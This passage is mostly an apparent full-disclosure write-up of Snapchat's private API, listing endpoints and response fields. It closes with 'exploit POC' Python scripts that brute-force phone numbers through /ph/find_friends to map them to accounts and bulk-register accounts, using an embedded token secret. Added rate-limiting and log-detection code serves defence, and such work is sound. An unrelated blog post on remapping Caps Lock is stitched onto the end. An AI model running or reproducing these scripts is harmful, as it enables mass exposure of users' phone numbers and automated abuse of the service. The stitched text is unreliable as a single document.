| thumbnail_data* | data | Optional thumbnail data. It will be generated for you if you leave this out. |
| zipped* | str | 0 or 1, indicating whether or not the data is gzipped. |
| type | int | The type of media you're uploading - 0 for images, 1 for videos |
| time | int | An integer, 1-10 inclusive of how long the snap will display for. |

NB! You get the media_id by first uploading your media.
NB! Your media_id and client_id have to be in the format YOURACCOUNT~UUID - otherwise this will return 400 Bad Request.
If your request was successful, you'll get something like this back:

```
{
    json: {
        story: {
            caption_text_display: "Foo, bar, baz!",
            id: "youraccount~1385123930172",
            username: "youraccount",
            mature_content: false,
            client_id: "YOURACCOUNT~E5273F6E-EF69-453A-BE05-EC232AD7482C",
            timestamp: 1385123930172,
            media_id: "5926704455352320",
            media_key: "rlcTSuolqwhiatuqT6533fbcyBvIU7e/i4ZFZPxFtco=",
            media_iv: "YXyO2gJ4PuLhwlHohxGOFE==",
            thumbnail_iv: "DrcQC5VRkjw+8KLp489xFA==",
            media_type: 0,
            time: 10.0,
            time_left: 86399893,
            media_url: "https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=5676384469352890",
            thumbnail_url: "https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=5911704785345329"
        }
    }
}
```

If your request was successful you'll get back a 202 Accepted with some JSON body content:

r.json.story is a dictionary of:

| Field name | Type | Explanation |
| --- | --- | --- |
| caption_text_display | str | Some form of caption - doesn't seem to be honored/rendered by the receiving client. |
| id | str | Your username (lowercase), a tilde, and the returned timestamp. |
| username | str | Your account username. |
| mature_content | bool | Whether or not story contains mature content. |
| client_id | str | The media_id/client_id you sent originally. |
| timestamp | int | The reply timestamp. |
| media_id | str | An id for this specific story segment. |
| media_key | str | base64'd key for decrypting this story (note, you also need the IV!). |
| media_iv | str | base64'd IV for decrypting this story (note, you also need the key!). |
| thumbnail_iv | str | base64'd IV for decrypting the thumbnail (use media_key!). |
| media_type | int | The type of media: 0 for images, 1 for videos. |
| time | long | The time this segment should be visible for. |
| time_left | int | The seconds left (*1000, for some reason) before this story expires. |
| media_url | str | A URL you can hit via GET to fetch the story's blob data. |
| thumbnail_url | str | A URL you can hit via GET to fetch the thumbnail's blob data. |

Deleting story segments (/bq/delete_story)

```
{
    username: "youraccount",
    timestamp: 1373207221,
    req_token: create_token(auth_token, 1373207221),
    story_id: "youraccount~1382716927240"
}
```

If your request was successful, you'll get back a 200 OK with no body content.

Appending segments to a story directly (/bq/retry_post_story)

This is the same as posting to a story, however there is an extra field (data) sent:

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",client_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",caption_text_display:"Foo, bar, baz!",thumbnail_data:ENCRYPTED_THUMBNAIL_DATA,zipped:"0",type:0,time:10,data:ENCRYPTED_STORY_DATA}
Field name | Type | Explanation
username | str | See: Common fields
timestamp | int | See: Common fields
req_token | str | See: Creating request tokens
media_id | str | A unique identifier for this media - Snapchat uses a UUID.
client_id | str | A unique client identifier - the same as the given media_id.
caption_text_display | str | Some form of caption - doesn't seem to be honored/rendered by the receiving client.
thumbnail_data* | data | Optional thumbnail data. It will be generated for you if you leave this out.
zipped* | str | 0 or 1, indicating whether or not the data is gzipped.
type | int | The type of media you're uploading - 0 for images, 1 for videos
time | int | An integer, 1-10 inclusive of how long the snap will display for.
data | data | The encrypted media data.

If your request was successful, you'll get back something similar to posting to a story.

Posting to a story and sending a snap (/bq/double_post)

This is the same as sending a normal snap, however there are extra fields sent:

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),media_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",client_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",recipient:"teamsnapchat,someguy",caption_text_display:"Foo, bar, baz!",thumbnail_data:ENCRYPTED_THUMBNAIL_DATA,type:0,time:5}
Field name | Type | Explanation
username | str | See: Common fields
timestamp | int | See: Common fields
req_token | str | See: Creating request tokens
media_id | str | A unique identifier for this media - Snapchat uses a UUID.
client_id | str | A unique client identifier - the same as the given media_id (from an upload).
recipient | str | A comma delimited list of recipients - e.g. teamsnapchat,someguy
caption_text_display | str | Some form of caption - doesn't seem to be honored/rendered by the receiving client.
thumbnail_data* | data | Optional thumbnail data. It will be generated for you if you leave this out.
type | int | The type of media you're uploading - 0 for images, 1 for videos
time | int | An integer, 1-10 inclusive of how long the snap will display for.

If your request failed you'll most likely get a 400 Bad Request.
If your request was successful, you'll get something like this back:

{story_response:{json:{story:{caption_text_display:"Foo, bar, baz!",id:"youraccount~1385367025231",username:"youraccount",mature_content:false,client_id:"YOURACCOUNT~9c0b0193-de58-4b8d-9a09-60039648ba7f",timestamp:1385367025231,media_id:"6539144374653924",media_key:"/crVtkYOvpDOVA8C8MhR+qWlzFkFodQi+2iOAK84E+Q=",media_iv:"oBp82Gr0tGHfBzC42cyleg==",thumbnail_iv:"UvCn/A+2qrXchJG0J6gCSw==",media_type:0,time:5.0,time_left:86399908,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=6539144374653924",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=6539144374653924"}},success:true},snap_response:{success:true}}

This reply is split into two portions: story_response and snap_response.
Both fields (story_response and snap_response) contain success, which is similar to the common field, logged.

story_response.json.story

Field name | Type | Explanation
caption_text_display | str | Some form of caption - doesn't seem to be honored/rendered by the receiving client.
id | str | Your username (lowercase), a tilde, and the returned timestamp.
username | str | Your account username.
mature_content | bool | Whether or not story contains mature content.
client_id | str | The media_id/client_id you sent originally.
timestamp | int | The reply timestamp.
media_id | str | An id for this specific story segment.
media_key | str | base64'd key for decrypting this story (note, you also need the IV!).
media_iv | str | base64'd IV for decrypting this story (note, you also need the key!).
thumbnail_iv | str | base64'd IV for decrypting the thumbnail (use media_key!).
media_type | int | The type of media: 0 for images, 1 for videos.
time | long | The time this segment should be visible for.
time_left | int | The seconds left (*1000, for some reason) before this story expires.
media_url | str | A URL you can hit via GET to fetch the story's blob data.
thumbnail_url | str | A URL you can hit via GET to fetch the thumbnail's blob data.

Finding your friends (/ph/find_friends)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),countryCode:"US",numbers:"{\"2125554240\": \"Norm (Security)\", \"3114378739\": \"Stephen Falken\"}"}
{logged:true,results:[{name:"norman",display:"Norm (Security)",type:1},{name:"stephenfalken",display:"Stephen Falken",type:0}]}
Field name | Type | Explanation
logged | bool | See: Common fields
results | list | A list of relevant results about found friends. Innards explained below.

The results field contains a list of maps each with three fields:

Field name | Type | Explanation
name | str | The account username of this person.
display | str | The display name reported to /ph/find_friends.
type | int | Whether the account is: public, 0; private, 1.

Making - or losing - friends (/ph/friend)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"add",friend:"someguy"}
Field name | Type | Explanation
username | str | See: Common fields
timestamp | int | See: Common fields
req_token | str | See: Creating request tokens
action | str | What type of action you're taking: add, delete, block, unblock, or display.
friend | str | The user (account name) we're applying this action to.

NB! The action display requires an extra field called display, which is the display name you're applying to the user.
If your request was successful, you'll get something like this back:

{message:"someguy was blocked",param:"someguy",logged:true}
Field name | Type | Explanation
logged | bool | See: Common fields
param | str | The user (given by friend in req.) the action was applied to.
message | str | A user presentable message explaining what action was taken.

Getting your friends' best friends (/bq/bests)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),friend_usernames:"['teamsnapchat','another_username']"}

NB! Any usernames that are not on your friends list will be completely omitted from the response.
If the request was successful, you'll get a response similar to this:

{teamsnapchat:{best_friends:["friend_one","friend_two","friend_three"],score:100},another_username:{best_friends:["friend_one","friend_two","friend_three"],score:100}}
Field name | Type | Explanation
best_friends | list | List of the given user's best friends.
score | int | The given user's Snapchat score.

Getting your friends' stories (/bq/stories)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221)}

If your request was successful, you'll get back something like this (hefty reply):

{mature_content_text:{title:"Content Warning",message:"The red exclamation mark on this Story indicates that Stories posted by this user may not be suitable for sensitive viewers. Do you wish to continue? After selecting 'Yes', you will never be prompted again.",yes_text:"Yes",no_text:"No"},my_stories:[{story:{id:"youraccount~1386362095231",username:"youraccount",mature_content:false,client_id:"YOURACCOUNT~e87a8f71-078b-4483-b051-b78f3d008717",timestamp:1386362095231,media_id:"6529624334955984",media_key:"/crVtkYOvpBAV08C8MhH+hWl4FDFodCi+2iOAK84E+Q=",media_iv:"oBp22Gr0t2HABDC4Wcylng==",thumbnail_iv:"UvCn/A+AqwXDCJG0Y6gCSw==",media_type:0,time:5.0,time_left:5885762,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=6529624334955984",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=6529624334955984"},story_notes:[{viewer:"someguy",screenshotted:false,timestamp:1385367139674,storypointer:{"mKey":"story:{youraccount}:19841127","mField":"071025.221Z"}}],story_extras:{view_count:1,screenshot_count:0}},{story:{id:"youraccount~1386362095231",username:"youraccount",mature_content:false,client_id:"YOURACCOUNT~eb53ae24-7534-40e6-4a00-b611a90ab6c4",timestamp:1386362095231,media_id:"7799203240896396",media_key:"dvv5/CXFOwOkskitqrX/x2PkQarzHAbPMwkzM0aWHIY=",media_iv:"4hJppjXvdjjqIgjxG6vExQ==",thumbnail_iv:"rC4UM3bgGPTTg7ovzO1fug==",media_type:0,time:5.0,caption_text_display:"Hack the planet, hack the 
planet!",time_left:5658516,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=7799203240896396",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=7799203240896396"},story_notes:[{viewer:"someguy",screenshotted:true,timestamp:1385366714056,storypointer:{"mKey":"story:{youraccount}:19841127","mField":"070637.986Z"}}],story_extras:{view_count:1,screenshot_count:0}}],friend_stories:[{username:"someguy",stories:[{story:{id:"someguy~1385439004799",username:"someguy",mature_content:false,client_id:"SOMEGUY~24823793-8333-4542-QF6C-D765CD6786D4",timestamp:1385452007799,media_id:"5549685943463504",media_key:"m1/kTyqt0E55jPyX+PexCP1++PUxTM6lqZC8kU/zcgI=",media_iv:"GvH/izpqBVBZQaAlmxWSSA==",thumbnail_iv:"Jx4tNSAaCuIkSX5DttTZJw==",media_type:0,time:10.0,zipped:false,time_left:86361636,media_url:"https://feelinsonice-hrd.appspot.com/bq/story_blob?story_id=5549685943463504",thumbnail_url:"https://feelinsonice-hrd.appspot.com/bq/story_thumbnail?story_id=5549685943463504"},viewed:false}]}]}
Field name | Type | Explanation
mature_content_text | dict | A dictionary with some strings to be displayed in a warning modal about mature content.
my_stories | list | A list of all segments of your story - See below.
friend_stories | list | A list of your friend's stories and their segments - See below.

my_stories.story is a dictionary of:

Field name | Type | Explanation
id | str | Your username (lowercase), a tilde, and the returned timestamp.
username | str | Your account username.
mature_content | bool | Whether or not this segment contains mature content.
client_id | str | Standard media_id in the format of USERNAME~UUID
timestamp | int | The reply timestamp (*1000).
media_id | str | An id for this specific story segment.
media_key | str | base64'd key for decrypting this story (note, you also need the IV!).
media_iv | str | base64'd IV for decrypting this story (note, you also need the key!).
thumbnail_iv | str | base64'd IV for decrypting the thumbnail (use media_key!).
media_type | int | The type of media: 0 for images, 1 for videos.
time | long | The time this segment should be visible for.
time_left | int | The seconds left (*1000, for some reason) before this story expires.
media_url | str | A URL you can hit via GET to fetch the story's blob data.
thumbnail_url | str | A URL you can hit via GET to fetch the thumbnail's blob data.
caption_text_display* | str | Not always present - seems to be (seldom often) set by the client on story upload.

my_stories.story_notes is a list of:

Field name | Type | Explanation
viewer | str | The viewer's account name.
screenshotted | bool | Whether or not they screenshotted the segment.
timestamp | int | When the viewing took place.
storypointer | dict | A strange dictionary with some misc. fields about the viewing.

my_stories.story_notes.storypointer is a dictionary of:

Field name | Type | Explanation
mKey | str | Your account name plus the date in the format of: story:{YOURACCOUNT}:YYYYMMDD
mField | str | More time related information.

my_stories.story_extras is a dictionary of:

Field name | Type | Explanation
view_count | int | What it says on the tin.
screenshot_count | int | What it says on the tin.

friend_stories is a list of:

Field name | Type | Explanation
username | str | Friend's username.
stories | list | A list of stories - See below.

friend_stories.stories.story is a dictionary of:

Field name | Type | Explanation
id | str | Friend's username (lowercase), a tilde, and the returned timestamp.
username | str | Friend's username.
mature_content | bool | Whether or not this segment contains mature content.
client_id | str | Standard media_id in the format of USERNAME~UUID
timestamp | int | The reply timestamp (*1000).
media_id | str | An id for this specific story segment.
media_key | str | base64'd key for decrypting this story (note, you also need the IV!).
media_iv | str | base64'd IV for decrypting this story (note, you also need the key!).
thumbnail_iv | str | base64'd IV for decrypting the thumbnail (use media_key!).
media_type | int | The type of media: 0 for images, 1 for videos.
time | long | The time this segment should be visible for.
zipped* | bool | Whether or not the blob data will be gzip compressed.
time_left | int | The seconds left (*1000, for some reason) before this story expires.
media_url | str | A URL you can hit via GET to fetch the story's blob data.
thumbnail_url | str | A URL you can hit via GET to fetch the thumbnail's blob data.
caption_text_display | str | Not always present - seems to be (seldom often) set by the client on story upload.

Getting updates (/bq/updates)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221)}

If your request was successful, you'll get back something like a request from logging in.

Sending updates (/bq/update_snaps)

This lets you report snaps as viewed or screenshotted.

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),added_friends_timestamp:1373206707,json:"{\"325922384426455124r\":{\"c\":0,\"t\":1385378843,\"replayed\":0}}",events:"[]"}
Field name | Type | Explanation
username | str | See: Common fields
timestamp | int | See: Common fields
req_token | str | See: Creating request tokens
added_friends_timestamp | int | The last time a friend added you - you'll get this from logging in or update calls.
json | str | A string representation of a dictionary of snap updates - See below.
events* | str | A string representation of a list of updates - used for BroadcastSnap views and misc analytics data.

json is a string representation of a dictionary like:

Field name | Type | Explanation
key | str | The ID of the snap we're pushing updates on.
c | int | Whether this is: seen, 0; screenshotted, 1
t | int | A timestamp of when this event occurred.
replayed | int | How many times this snap has been replayed.

events is a string representation of a list of dictionaries like:

Field name | Type | Explanation
mEventName | str | The type of event that happened. (e.g: ERROR: SnapEncryptionAlgorithm.decrypt failed)
mParams | str | A string representation of a dictionary, usually with the single key message.
mTimestamp | int | Timestamp of when this event occurred.

If your request was successful, you'll get back a 200 OK with no body content.

Sending more updates (/bq/update_stories)

This lets you report stories as viewed or screenshotted (much like above).

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),friend_stories:"[{\"id\":\"someguy~1385712923240\",\"screenshot_count\":0,\"timestamp\":1385712932690}]"}

friend_stories is a string representation of a list of dictionaries like:

Field name | Type | Explanation
id | str | The story segment id we're pushing updates on.
screenshot_count | int | How many screenshots we've taken of this segment.
timestamp | int | A timestamp of when this event occurred.

If your request was successful, you'll get back a 200 OK with no body content.

Clearing your feed (/ph/clear)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221)}

If your request was successful, you'll get back a 200 OK with no body content.

Updating your account settings (/ph/settings)

There are a few request fields that are consistent in use across /ph/settings:

Updating your birthday

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateBirthday",birthday:"02-25"}
Field name | Type | Explanation
Various | | See above.
action | str | updateBirthday
birthday | str | Your birthday in the format MM-DD.

If your request was successful, you'll get something like this back:

{logged:true,message:"Birthday updated",param:"0000-02-25"}
Field name | Type | Explanation
logged | bool | See: Common fields
message | str | A user presentable message explaining what action was taken.
param | str | Your birthday, in the format 0000-MM-DD.

Updating your attached email

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateEmail",email:"[email protected]"}
Field name | Type | Explanation
Various | | See above.
action | str | updateEmail
email | str | Your current email you'd like linked to the account.

If your request was successful, you'll get something like this back:

Field name | Type | Explanation
logged | bool | See: Common fields
message | str | A user presentable message explaining what action was taken.
param | str | The given email.

Updating your account privacy

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updatePrivacy",privacySetting:"1"}
Field name | Type | Explanation
Various | | See above.
action | str | updatePrivacy
privacySetting | str | The new privacy setting: public, 0; private, 1;

If your request was successful, you'll get something like this back:

{logged:true,message:"Snap privacy updated",param:"1"}
Field name | Type | Explanation
logged | bool | See: Common fields
message | str | A user presentable message explaining what action was taken.
param | str | The given privacySetting.

Updating your story privacy

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateStoryPrivacy",privacySetting:"EVERYONE"}
Field name | Type | Explanation
Various | | See above.
action | str | updateStoryPrivacy
privacySetting | str | The new privacy setting: public, EVERYONE; friends only, FRIENDS; or a custom selection, CUSTOM;

The privacy setting CUSTOM requires an extra field called storyFriendsToBlock:

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateStoryPrivacy",privacySetting:"CUSTOM",storyFriendsToBlock:"['teamsnapchat','another_username']"}
Field name | Type | Explanation
Various | | See above.
storyFriendsToBlock | str | A string representation of a JSON list of friend usernames to block from seeing your stories.

If your request was successful, you'll get something like this back:

{logged:true,message:"Story privacy updated",param:"EVERYONE"}
Field name | Type | Explanation
logged | bool | See: Common fields
message | str | A user presentable message explaining what action was taken.
param | str | The given privacySetting.

Updating your maturity settings

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),action:"updateCanViewMatureContent",canViewMatureContent:true}
Field name | Type | Explanation
Various | | See above.
action | str | updateCanViewMatureContent
canViewMatureContent | bool | The new maturity setting, as a boolean.

For some reason this never replies with anything other than a 200 OK with no body content.
If your request was successful (read: didn't break), you'll get a 200 OK with no body content.

Updating feature settings (/bq/update_feature_settings)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),settings:"{\"smart_filters\": false, \"visual_filters\": false, \"special_text\": true, \"replay_snaps\": false, \"front_facing_flash\": false}"}
Field name | Type | Explanation
username | str | See: Common fields
timestamp | int | See: Common fields
req_token | str | See: Creating request tokens
settings | str | A string representation of a dictionary telling Snapchat which feature settings you've enabled. Features are: smart_filters, visual_filters, special_text, replay_snaps, front_facing_flash.

If your request was successful, you'll get back a 200 OK with no body content.

Choosing your number of best friends (/bq/set_num_best_friends)

{username:"youraccount",timestamp:1373207221,req_token:create_token(auth_token,1373207221),num_best_friends:3}

If your request was successful, you'll get something like this back:

{best_friends:["someguy","gibsec"]}
Field name | Type | Explanation
best_friends | list | A list of your best friends.

Obligatory exploit POCs

What would our full disclosure be if not tied together with some obligatory proof of concept scripts? We've taken some of our favorite exploits and turned them into lovely POC scripts for you to tinker with and hack to your heart's content.

The find_friends exploit

This is one of our personal favorites since it's just so ridiculously easy to exploit. A single request (once logged in, of course!) to /ph/find_friends can find out whether or not a phone number is attached to an account.

This is one of the things we initially wrote about in our previous release, approximately four months ago (at the time of writing)! They've yet to add any rate limiting to this, so we thought we'd add a non-watered down version of the exploit to this release; maybe Evan Spiegel will fix it when someone finds his phone number via this?

We did some back-of-the-envelope calculations based on some number crunching we did (on an unused range of numbers). We were able to crunch through 10 thousand phone numbers (an entire sub-range in the American number format (XXX) YYY-ZZZZ - we did the Z's) in approximately 7 minutes on a gigabit line on a virtual server. Given some asynchronous optimizations, we believe that you could potentially crunch through that many in as little as a minute and a half (or, as a worst case, two minutes). This means you'd be railing through as many as 6666 phone numbers a minute (or, in our worst case, 5000!).

Using the reported 8 million users in June as a rough estimate for Snapchat's user base (however, it will have undoubtedly exponentially grown since then), we can do some rough calculations on how long it would take to crunch through all of Snapchat's user base:

Given user_base = 8e6 (8 million), and a numbers crunchable per minute (ncpm) of approximately 6666, we can assume that it would take approximately 20 hours for one $10 virtual server to eat through and find every user's phone number (hours = user_base / (ncpm*60)). At our worst case of ncpm = 5000, it would take approximately 26.6 hours.

This is all assuming that users' phone numbers are:

  • All incremental (e.g. (000) 000-0000, (000) 000-0001, ...)
  • All American.

Evidently (fortunately?) this is not the case, however, it's sort of scary to think about, isn't it? Hopping through the particularly "rich" area codes of America, potential malicious entities could create large databases of phone numbers -> Snapchat accounts in minutes.

In an entire month, you could crunch through as many as 292 million numbers with a single server ((ncpm*60)*730, approximately 730 hours in a month). Add more servers (or otherwise increase your number crunching capabilities) and you can get through a seemingly infinite amount of numbers. It's unlikely Snapchat's end would ever be the bottleneck in this, seeing as it's run on Google App Engine, which (as we all know) is an absolute tank when it comes to handling load.

The following script will simply read a list of numbers from stdin, iterate through them and write any results to stdout.
Use it like: python2 find_friends.py $username $password < numbers.txt > results.txt

#!/usr/bin/env python2
# python2 find_friends.py $username $password < numbers.txt > results.txt
import requests
import hashlib
import json
import sys


def request_token(auth_token, timestamp):
    secret = "iEk21fuwZApXlz93750dmW22pw389dPwOk"
    pattern = "0001110111101110001111010101111011010001001110011000110001000110"
    first = hashlib.sha256(secret + auth_token).hexdigest()
    second = hashlib.sha256(str(timestamp) + secret).hexdigest()
    bits = [first[i] if c == "0" else second[i] for i, c in enumerate(pattern)]
    return "".join(bits)


numbers = sys.stdin.read().split("\n")
base = "https://feelinsonice.appspot.com"
r = requests.post(base + "/bq/login", data={
    # These are hardcoded, just because it's easy.
    "req_token": "9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b",
    "timestamp": 1373209025,
    "username": sys.argv[1],
    "password": sys.argv[2]
}, headers={"User-agent": None})
auth_token, username = r.json()["auth_token"], r.json()["username"]

# We can hardcode these as well.
static = {
    "req_token": request_token(auth_token, 1373209025),
    "countryCode": "US",
    "timestamp": 1373209025,
    "username": username
}

for number in numbers:
    n = json.dumps({number: "J. R. Hacker"})
    r = requests.post(base + "/ph/find_friends", data=dict(static, numbers=n), headers={"User-agent": None}).json()
    if len(r["results"]) < 1:
        continue
    sys.stdout.write("{0} -> {1}\n".format(number, r["results"][0]["name"]))
    sys.stdout.flush()
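The write-up attributes this issue to the absence of any rate limiting on /ph/find_friends. The following is an added Python 3 example (not code from the original write-up or from Snapchat) of a server-side budget on distinct phone numbers per account, replayed against the 10,000-number sub-range and the 6666 numbers-per-minute rate quoted above. The 500-numbers-per-24-hours budget, the class and function names, and the sample address book are assumptions.

```python
from collections import defaultdict


class DistinctNumberBudget:
    """Per-account cap on distinct phone numbers resolved within a sliding window.

    Re-sending numbers already charged in the window is free, so a client that
    re-syncs the same address book is unaffected; only new numbers cost budget.
    """

    def __init__(self, max_distinct, window_s):
        self.max_distinct = max_distinct  # assumed policy value, tune per service
        self.window_s = window_s
        self._seen = defaultdict(dict)    # account -> {number: time it was charged}

    def _expire(self, account, now):
        seen = self._seen[account]
        cutoff = now - self.window_s
        # dicts keep insertion order, so the oldest charge is always first
        while seen:
            oldest = next(iter(seen))
            if seen[oldest] > cutoff:
                break
            del seen[oldest]

    def allow(self, account, numbers, now):
        """Charge the request and return True, or return False and charge nothing."""
        self._expire(account, now)
        seen = self._seen[account]
        fresh = {n for n in numbers if n not in seen}
        if len(seen) + len(fresh) > self.max_distinct:
            return False
        for n in sorted(fresh):
            seen[n] = now
        return True


def longest_consecutive_run(numbers):
    """Longest run of numerically adjacent numbers (n, n+1, n+2, ...).

    Assumes digits-only, already normalised numbers. Real address books
    produce short runs; a range sweep produces one long run.
    """
    values = sorted({int(n) for n in numbers})
    best = run = 1 if values else 0
    for prev, cur in zip(values, values[1:]):
        run = run + 1 if cur == prev + 1 else 1
        best = max(best, run)
    return best


def simulate_sweep(budget, account, first, count, per_minute):
    """Replay one-number-per-request lookups over [first, first + count)."""
    answered = 0
    for i in range(count):
        now = i * 60.0 / per_minute
        if budget.allow(account, ["%010d" % (first + i)], now):
            answered += 1
    return answered


def resync_allowed(budget, account, book, hours):
    """True if an hourly re-sync of the same address book is never refused."""
    return all(budget.allow(account, book, h * 3600.0) for h in range(hours))


# Constructed sample address book (fictional 555 numbers).
ADDRESS_BOOK = ["2125550101", "2125550102", "3105550147", "4155550199", "6465550123"]

if __name__ == "__main__":
    budget = DistinctNumberBudget(max_distinct=500, window_s=86400)
    print("sweep answered:", simulate_sweep(budget, "sweeper", 2125550000, 10000, 6666))
    print("hourly re-sync ok:", resync_allowed(budget, "alice", ADDRESS_BOOK, 48))
    print("longest run in address book:", longest_consecutive_run(ADDRESS_BOOK))
```

With this budget the sweep is cut off after 500 answers per account per day, while the hourly re-sync is never refused; the run-length function gives a second signal that can be alerted on even when the budget is set generously.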

Bulk registration of accounts

This isn't so much of an exploit as taking advantage of the really lax registration functionality. Two requests, /bq/register and /ph/registeru, can give you an account.

This script reads a list of accounts from stdin, attempts to register them, then prints the valid registered accounts to stdout. Format your account list like this:

account1:password1:[email protected]
account2:password2:[email protected]
account3:password3:[email protected]
... ad infinitum

Use it like: python2 bulk_register.py < accounts.txt > registered.txt

#!/usr/bin/env python2
# python2 bulk_register.py < accounts.txt > registered.txt
# format accounts.txt like `username:password:email`
import requests
import sys

accounts = [a.split(":") for a in sys.stdin.read().split("\n") if a.strip() != ""]
base = "https://feelinsonice.appspot.com"

for account in accounts:
    username, password, email = account
    reg = requests.post(base + "/bq/register", data={
        "req_token": "9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b",
        "timestamp": 1373209025,
        "email": email,
        "password": password,
        "age": 19,
        "birthday": "1994-11-27",
    }, headers={"User-agent": None})
    if not reg.json()["logged"]:
        continue
    nam = requests.post(base + "/ph/registeru", data={
        "req_token": "9301c956749167186ee713e4f3a3d90446e84d8d19a4ca8ea9b4b314d1c51b7b",
        "timestamp": 1373209025,
        "email": email,
        "username": username
    }, headers={"User-agent": None})
    if not nam.json()["logged"]:
        continue
    sys.stdout.write(":".join(account) + "\n")
    sys.stdout.flush()
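The registration script sends the same hardcoded timestamp and req_token for every account and no User-Agent header, which leaves a recognisable pattern in server logs. The following is an added Python 3 detection example (not code from the original write-up or from Snapchat) that groups registration requests by their (timestamp, req_token) pair and flags the groups that look scripted. The log field names, the thresholds and the sample records are constructed assumptions.

```python
import json
from collections import defaultdict

REGISTER_PATHS = {"/bq/register", "/ph/registeru"}

# Constructed sample records, one JSON object per line. Field names (ts, path,
# ua, req_ts, req_token, email) are assumptions about what an access log would
# carry; the req_token values are placeholders, not real tokens.
SAMPLE_LOG = """
{"ts": 1388102400, "path": "/bq/register", "ua": null, "req_ts": 1373209025, "req_token": "PLACEHOLDER-A", "email": "acct1@example.test"}
{"ts": 1388102401, "path": "/ph/registeru", "ua": null, "req_ts": 1373209025, "req_token": "PLACEHOLDER-A", "email": "acct1@example.test"}
{"ts": 1388102402, "path": "/bq/register", "ua": null, "req_ts": 1373209025, "req_token": "PLACEHOLDER-A", "email": "acct2@example.test"}
{"ts": 1388102403, "path": "/ph/registeru", "ua": null, "req_ts": 1373209025, "req_token": "PLACEHOLDER-A", "email": "acct2@example.test"}
{"ts": 1388102404, "path": "/bq/register", "ua": null, "req_ts": 1373209025, "req_token": "PLACEHOLDER-A", "email": "acct3@example.test"}
{"ts": 1388102410, "path": "/bq/register", "ua": "ExampleClient/1.0", "req_ts": 1388102409, "req_token": "PLACEHOLDER-B", "email": "person@example.test"}
{"ts": 1388102412, "path": "/ph/registeru", "ua": "ExampleClient/1.0", "req_ts": 1388102409, "req_token": "PLACEHOLDER-B", "email": "person@example.test"}
{"ts": 1388102413, "path": "/bq/stories", "ua": "ExampleClient/1.0", "req_ts": 1388102413, "req_token": "PLACEHOLDER-C", "username": "person"}
not json at all
"""


def find_bulk_registration(lines, max_age_s=300, min_emails=3):
    """Group registration requests by (req_ts, req_token) and flag scripted groups.

    Signals, each weak alone, so a group is reported only when two or more hold:
      token_reused_across_accounts  one token/timestamp pair used for many emails
      stale_timestamp               client timestamp far older than server time
      no_user_agent                 every request in the group lacked a User-Agent
    """
    groups = defaultdict(lambda: {"emails": set(), "requests": 0, "stale": 0, "no_ua": 0})
    for line in lines:
        try:
            rec = json.loads(line)
        except ValueError:
            continue  # blank or malformed line: skip it rather than abort the scan
        if not isinstance(rec, dict) or rec.get("path") not in REGISTER_PATHS:
            continue
        try:
            key = (int(rec["req_ts"]), str(rec["req_token"]))
            age = int(rec["ts"]) - key[0]
            email = str(rec["email"]).strip().lower()
        except (KeyError, TypeError, ValueError):
            continue  # record is missing a field this check needs
        group = groups[key]
        group["emails"].add(email)
        group["requests"] += 1
        group["stale"] += age > max_age_s
        group["no_ua"] += not rec.get("ua")

    findings = []
    for (req_ts, token), group in sorted(groups.items()):
        reasons = []
        if len(group["emails"]) >= min_emails:
            reasons.append("token_reused_across_accounts")
        if group["stale"]:
            reasons.append("stale_timestamp")
        if group["no_ua"] == group["requests"]:
            reasons.append("no_user_agent")
        if len(reasons) >= 2:
            findings.append({
                "req_ts": req_ts,
                "req_token": token,
                "accounts": len(group["emails"]),
                "requests": group["requests"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_bulk_registration(SAMPLE_LOG.splitlines()):
        print(finding)
```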


A useful Caps Lock key - BrettTerpstra.com


Comments:"A useful Caps Lock key - BrettTerpstra.com"

URL:http://brettterpstra.com/2012/12/08/a-useful-caps-lock-key/


I’ve had my Caps Lock key remapped to an escape key for some time now. I’ve become quite used to it — to the point where using other people’s keyboards is inconvenient. Given that I’ve already ruined my muscle memory, I figured I’d take it a step further. The end result is that hitting my Caps Lock key once still gives me “Escape,” but holding it triggers a “Hyper” modifier key (simultaneous Control, Shift, Option and Command). I can map the Hyper key using any of an assortment of utilities to do all kinds of fun things.

This is a slightly simplified version of what Steve Losh presented earlier this year, specifically the remapping that takes place in the Hyper section of that post. The idea is the same, but this doesn’t modify the behavior of the Control key; my muscle memory just wasn’t ready to accept that.

